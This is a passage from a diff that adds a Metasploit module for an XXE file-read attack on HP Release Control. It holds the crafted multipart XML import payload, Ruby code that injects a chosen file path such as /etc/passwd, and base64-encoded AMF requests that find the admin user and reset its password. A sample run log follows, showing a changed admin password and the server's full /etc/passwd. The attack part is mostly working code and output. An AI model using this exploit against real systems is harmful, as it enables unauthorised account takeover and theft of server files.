Risk</title><portletDefinitionUuid>6a3673c9feb76dcb:-519708cc:1172ba579ed:-7ff1</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294920][Closed]</value></value></preferenceValue><preferenceValue><name>Minimun Value</name><value><sequence>0</sequence><value>[0][]</value></value></preferenceValue><preferenceValue><name>Interval</name><value><sequence>0</sequence><value>[10][]</value></value></preferenceValue><preferenceValue><name>Maximum Value</name><value><sequence>0</sequence><value>[100][]</value></value></preferenceValue><preferenceValue><name>Numeric Type</name><value><sequence>0</sequence><value>[calculated-risk][calculated-risk]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>1</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><autoRefresh>false</autoRefresh><refreshInterval>0</refreshInterval></page></Module><PortletDefinition><BarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>CHANGE_IMPACT_ANALYSIS_RATIO</id><name>Change Request Impact Analysis Ratio</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Request Status</name><type>dropdown</type><prompt>Request Status</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[PENDING_APPROVAL][Pending
							Approval]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>defwafdsafdsa</chartTitle><colorSource>Status Color</colorSource><tooltipSource># Requests</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Status</barNameSource><barAxisLabel>Status</barAxisLabel><valueSource># Requests</valueSource><valueAxisLabel># Requests</valueAxisLabel></BarChartPortletDefinition><type>BarChart</type><name>Change Request Impact Analysis Ratio</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffe</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>true</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>CHANGE_OVER_TIME_DATA_SOURCE</id><name>Changes Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Changes Over Time</chartTitle><colorSource/><tooltipSource>Count</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Count</yAxisSource><yAxisLabel>Count</yAxisLabel><seriesSource>Line Label</seriesSource><seriesLabel>Changes</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Changes Over Time</name><uuid>329c812c51783e9e:6a9520f3:11639817da2:-7fec</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><MultiBarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>APPLICATION_STATUS_DISTRIBUTION</id><name>Business CI Status Distribution</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>User Applications</name><type>yesNo</type><prompt>Show Only User Applications</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[Y][Yes]</defaultValue><displayOption>editablePref</displayOption></preference><preference><name>Time Frame</name><type>dropdown</type><prompt>Created Within</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[Last Month][Last Month]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Application Status Distribution</chartTitle><colorSource/><tooltipSource># Requests</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Impacted Application</barNameSource><barAxisLabel>Impacted Application</barAxisLabel><valueSource># Requests</valueSource><valueAxisLabel># Requests</valueAxisLabel><seriesSource>Status</seriesSource><seriesLabel>Status</seriesLabel></MultiBarChartPortletDefinition><type>ClusteredBarChart</type><name>Application Status Distribution</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-7fff</uuid><description/><timeout>20</timeout><defaultWidth>2</defaultWidth><enabled>true</enabled><exportAsWSRP>true</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>CHANGE_OVER_TIME_DATA_SOURCE</id><name>Changes Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[294918][Latent]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Latent Changes Over Time</chartTitle><colorSource/><tooltipSource>Count</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Count</yAxisSource><yAxisLabel>Count</yAxisLabel><seriesSource>Line Label</seriesSource><seriesLabel>Latent Changes</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Latent Changes Over Time</name><uuid>3b7bb6aa02977f5c:6940210b:1163bcb394a:-7fdf</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><MultiBarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>OUTCOME_GROUPBY_NUMERIC_FIELD_DATA_SOURCE</id><name>Outcome Group by Numeric Field</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Maximum Value</name><type>text</type><prompt>Maximum Value:</prompt><layoutRow>3</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[100][]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Minimun Value</name><type>text</type><prompt>Minimun Value:</prompt><layoutRow>2</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[0][]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Interval</name><type>text</type><prompt>Interval:</prompt><layoutRow>4</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[10][]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference><preference><name>Numeric Type</name><type>dropdown</type><prompt>Numeric Type:</prompt><layoutRow>1</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[calculated-risk][calculated-risk]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Outcome Group By Risk</chartTitle><colorSource>Color</colorSource><tooltipSource>Tooltip</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Field</barNameSource><barAxisLabel>Risk</barAxisLabel><valueSource>Percentage</valueSource><valueAxisLabel>Percentage</valueAxisLabel><seriesSource>Outcome</seriesSource><seriesLabel>Outcome</seriesLabel></MultiBarChartPortletDefinition><type>ClusteredBarChart</type><name>Outcome Grouped By Risk</name><uuid>6a3673c9feb76dcb:-519708cc:1172ba579ed:-7ff1</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><MultiBarChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>APPLICATION_SEVERITY_DISTRIBUTION</id><name>Business CI Severity Distribution</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>User Applications</name><type>yesNo</type><prompt>Show Only User Applications</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[Y][Yes]</defaultValue><displayOption>editablePref</displayOption></preference><preference><name>Request Status</name><type>dropdown</type><prompt>Request Status</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[PENDING_APPROVAL][Pending
							Approval]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Application Severity Distribution</chartTitle><colorSource>Severity Colors</colorSource><tooltipSource># Requests</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation>vertical</orientation><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><barNameSource>Impacted Application</barNameSource><barAxisLabel>Impacted Application</barAxisLabel><valueSource># Requests</valueSource><valueAxisLabel># Requests</valueAxisLabel><seriesSource>Severity</seriesSource><seriesLabel>Severity</seriesLabel></MultiBarChartPortletDefinition><type>ClusteredBarChart</type><name>Application Severity Distribution</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-8000</uuid><description/><timeout>20</timeout><defaultWidth>2</defaultWidth><enabled>true</enabled><exportAsWSRP>true</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>ABNORMAL_CHANGE_OVER_TIME_DATA_SOURCE</id><name>Abnormal Changes Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>0</layoutRow><layoutColumn>1</layoutColumn><layoutWidth>1</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>1</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Abnormal Changes Over Time</chartTitle><colorSource/><tooltipSource>Count</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Count</yAxisSource><yAxisLabel>Count</yAxisLabel><seriesSource>Line Label</seriesSource><seriesLabel>Abnormal Changes</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Abnormal Changes Over Time</name><uuid>329c812c51783e9e:6a9520f3:11639817da2:-7feb</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition><PortletDefinition><LineChartPortletDefinition><ChartPortletDefinition><BuilderPortletDefinition><dataSource><id>OUTCOME_OVER_TIME_DATA_SOURCE</id><name>Outcome Over Time</name></dataSource><preferenceSummaryShown>true</preferenceSummaryShown><requireEditBeforeFirstView>false</requireEditBeforeFirstView><helpText/><preference><name>Filter</name><type>dropdown</type><prompt>Filter:</prompt><layoutRow>0</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue/><displayOption>requiredEditablePref</displayOption></preference><preference><name>Group By</name><type>dropdown</type><prompt>Group By:</prompt><layoutRow>1</layoutRow><layoutColumn>0</layoutColumn><layoutWidth>2</layoutWidth><defaultValue>[week][Week]</defaultValue><displayOption>requiredEditablePref</displayOption></preference></BuilderPortletDefinition><chartTitle>Outcome Over Time</chartTitle><colorSource>Color</colorSource><tooltipSource>Tooltip</tooltipSource><tooltipContainsHTML>false</tooltipContainsHTML><orientation/><hyperlink><hyperlinkType>noHyperlink</hyperlinkType><hyperlinkSource/></hyperlink></ChartPortletDefinition><xAxisSource>Planning Start Time</xAxisSource><xAxisLabel>Planning Start Time</xAxisLabel><yAxisSource>Percentage</yAxisSource><yAxisLabel>Percentage</yAxisLabel><seriesSource>Outcome</seriesSource><seriesLabel>Outcome</seriesLabel></LineChartPortletDefinition><type>LineChart</type><name>Outcome Over Time</name><uuid>6a3673c9feb76dcb:-36256166:1172b2915a2:-7ff4</uuid><description/><timeout>20</timeout><defaultWidth>1</defaultWidth><enabled>true</enabled><exportAsWSRP>false</exportAsWSRP><supportDrillTo>true</supportDrillTo><portletCommSup>false</portletCommSup><builtIn>false</builtIn><dependentUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</dependentUuid></PortletDefinition></ExportList>

-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".replacePortletDefs"

Y
-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".replaceModules"

Y
-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".trial"


-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".renameSuffix"


-----------------------------14627076671482452060466499926--")
+
+ data = data.sub('/etc/passwd', datastore['FILEPATH'])
+
+ res = send_request_cgi({
+ 'uri' => '/ccm/dashboard/app/migrator/ImportResult.jsp',#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'),
+ 'method' => 'POST',
+ 'ctype' => 'multipart/form-data; boundary=---------------------------14627076671482452060466499926',
+ 'cookie' => cookie,
+ 'data' => data.to_s
+ })
+
+ select(nil, nil, nil, 5)
+ post = {
+ 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.' => 'Y',
+ '.exportPortletDefsLabel' => '',
+ '.exportPortletDefsHidden' => '',
+ '.exportModulesLabel' => 'Release Control Default Module',
+ '.exportModulesHidden' => '[98304][Release Control Default Module]'
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ExportResult.jsp?ISWINDOID=Y'),
+ 'method' => 'POST',
+ 'data' => 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D',
+ 'cookie' => cookie
+ })
+
+ doc = REXML::Document.new res.body
+
+ file = ''
+ doc.elements.each('/ExportList/Module/description') do |element|
+ file = element.text
+ end
+
+ print file
+ end
+
+ def change_admin_password(cookie, admin_id)
+ req = Rex::Text::decode_base64("AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo=")
+ password = Rex::Text::rand_text_alpha(8)
+ req = req.sub("\x0f1769472", "\x0d"+admin_id).sub("passw0rd", password)
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amf'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-amf',
+ 'data' => req,
+ 'cookie' => cookie
+ })
+
+ return password
+ end
+
+ def get_admin_id(cookie)
+ req = Rex::Text::decode_base64("AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amfsecure'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-amf',
+ 'data' => req,
+ 'cookie' => cookie
+ })
+
+ begin
+ idx = res.body.index("admin admin")
+ idx = idx + "admin admin".length + 25 + 1 + 1
+ id = res.body[idx+1..idx+6]
+ return id
+ rescue
+ return nil
+ end
+ end
+end
+
+__END__
+
+msf auxiliary(hp_release_control_xxe) > show options
+
+Module options (auxiliary/gather/hp_release_control_xxe):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ FILEPATH /etc/passwd yes The filepath to read on the server
+ PASSWORD passw0rd yes The password to authenticate with
+ Proxies http:192.168.1.45:8080 no Use a proxy chain
+ RHOST 192.168.1.109 yes The target address
+ RPORT 8080 yes The target port
+ TARGETURI / yes Base directory path
+ USERNAME username yes The username to authenticate with
+ VHOST no HTTP server virtual host
+
+msf auxiliary(hp_release_control_xxe) > run
+
+[*] Authenticating
+[*] Found admin id: 229376
+[*] Changing admin's password...
+[*] Changed admin password to: ZaDdExMx
+[-] Auxiliary failed: RuntimeError Login failed:
+[-] Call stack:
+[-] /home/bperry/Projects/metasploit-framework/lib/msf/core/module.rb:745:in `fail_with'
+[-] /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:108:in `run'
+[*] Auxiliary module execution completed
+msf auxiliary(hp_release_control_xxe) > run
+
+[*] Authenticating
+[*] Found admin id: 229376
+[*] Changing admin's password...
+[*] Changed admin password to: upvsoveu
+[*] Exploiting XXE...
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
+abrt:x:173:173::/etc/abrt:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+tcpdump:x:72:72::/:/sbin/nologin
+oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
+release-control:x:500:500::/opt/HP/rc:/bin/bash
+rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin
+pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
+gdm:x:42:42::/var/lib/gdm:/sbin/nologin
+avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
+fdsa:x:501:501::/home/fdsa:/bin/bash
+[*] Auxiliary module execution completed
+msf auxiliary(hp_release_control_xxe) >
\ No newline at end of file